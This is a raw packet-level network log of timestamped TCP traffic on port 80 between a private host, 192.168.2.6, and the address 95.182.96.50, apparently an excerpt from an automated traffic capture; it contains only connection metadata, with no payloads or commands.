Oct 24, 2024 13:54:22.454447985 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.454452038 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454468966 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454471111 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.454471111 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.454483986 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454493046 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.454500914 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454515934 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454521894 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.454531908 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454543114 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.454547882 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454565048 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454570055 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.454581022 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454591036 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.454596996 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454611063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454617977 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.454627037 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454639912 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.454643965 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454660892 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454660892 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.454684019 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.454705954 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.495634079 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.495656967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.495673895 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.495691061 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.495728016 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.495759964 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.564625025 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.564660072 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.564678907 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.564712048 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.564732075 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.564775944 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.564806938 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.564835072 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.564848900 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.564857006 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.564863920 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.564872980 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.564881086 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.564894915 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.564899921 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.564910889 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.564927101 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.564935923 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.564941883 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.564951897 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.564958096 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.564975023 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.564980030 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.564990997 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.565005064 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.565009117 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.565021038 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.565032005 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.565072060 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.565165997 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.565180063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.565203905 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.565217018 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.565221071 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.565237999 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.565238953 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.565257072 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.565262079 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.565275908 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.565283060 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.565289021 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.565299034 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.565316916 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.565320969 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.565342903 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.565344095 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.565360069 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.565366983 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.565392017 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.565402031 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.565443993 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.565459967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.565485954 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.565500021 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.565516949 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.565525055 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.565532923 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.565555096 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.565572977 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.565887928 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.565903902 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.565920115 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.565928936 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.565943003 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.565956116 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.566168070 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.566195965 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.566210985 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.566237926 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.566237926 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.566248894 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.566272974 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.566288948 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.566303968 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.566314936 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.566320896 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.566323996 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.566337109 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.566340923 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.566360950 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.566370010 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.566370964 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.566399097 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.566409111 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.566415071 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.566468954 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.566473961 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.566493034 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.566508055 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.566540956 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.566550016 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.566567898 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.566584110 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.566601992 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.566606045 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.566631079 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.566643953 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.566673994 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.566690922 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.566706896 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.566715002 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.566721916 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.566725016 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.566740036 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.566741943 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.566761017 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.566778898 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.566808939 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.566840887 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.566854954 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.566869974 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.566878080 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.566900015 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.566906929 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.566916943 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.566934109 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.566948891 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.566972017 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.566989899 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.567044973 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.567084074 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.567174911 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.567192078 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.567214966 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.567228079 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.567318916 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.567334890 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.567351103 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.567359924 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.567365885 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.567372084 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.567383051 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.567390919 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.567395926 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.567404985 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.567419052 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.567424059 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.567434072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.567441940 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.567460060 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.567462921 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.567476034 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.567481041 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.567492008 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.567493916 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.567512035 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.567519903 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.567528963 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.567533970 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.567549944 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.567559958 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.567565918 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.567579985 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.567590952 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.567596912 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.567605972 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.567611933 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.567629099 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.567635059 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.567663908 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.567889929 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.567948103 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.567977905 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.567994118 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568018913 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568034887 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568049908 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568061113 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.568064928 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568082094 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568092108 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.568097115 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568099976 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.568124056 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568130016 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.568140984 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568156958 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568181038 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568197012 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568198919 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.568212032 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568223000 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.568228960 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568244934 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568250895 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.568263054 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568278074 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.568300009 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.568315029 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568342924 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568358898 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568397045 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.568399906 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568416119 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568454027 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.568485022 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568499088 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568514109 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568531036 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568541050 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.568545103 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568555117 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.568562984 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568583012 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.568609953 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.568708897 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568726063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568763971 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.568799019 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568815947 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568831921 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568847895 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.568856001 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.568882942 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.569204092 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569228888 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569256067 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569269896 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569277048 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.569289923 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569304943 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.569304943 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569322109 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.569323063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569351912 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569356918 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.569375992 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.569380045 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569396019 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569411993 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569417953 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.569426060 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569437981 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.569442034 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569473028 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569475889 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.569489002 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569490910 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.569505930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569516897 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.569534063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569534063 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.569544077 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.569550991 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569567919 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569576979 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.569583893 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569600105 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569603920 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.569616079 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569624901 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.569633007 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569647074 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569653034 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.569663048 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569674015 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.569694042 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569700956 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.569710016 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569726944 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.569736958 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569751978 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569757938 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.569767952 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569771051 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.569786072 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569786072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.569802999 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569808006 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.569819927 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569823027 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.569835901 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569840908 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.569854021 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569855928 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.569864035 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.569873095 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.569891930 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.570085049 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.611073971 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.611099958 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.611116886 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.611133099 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.611157894 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.611232996 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680074930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680110931 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680129051 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680135012 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680167913 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680167913 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680192947 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680210114 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680229902 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680238962 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680249929 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680257082 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680273056 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680278063 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680294037 CEST	49714	80	192.168.2.6	95.182.96.50
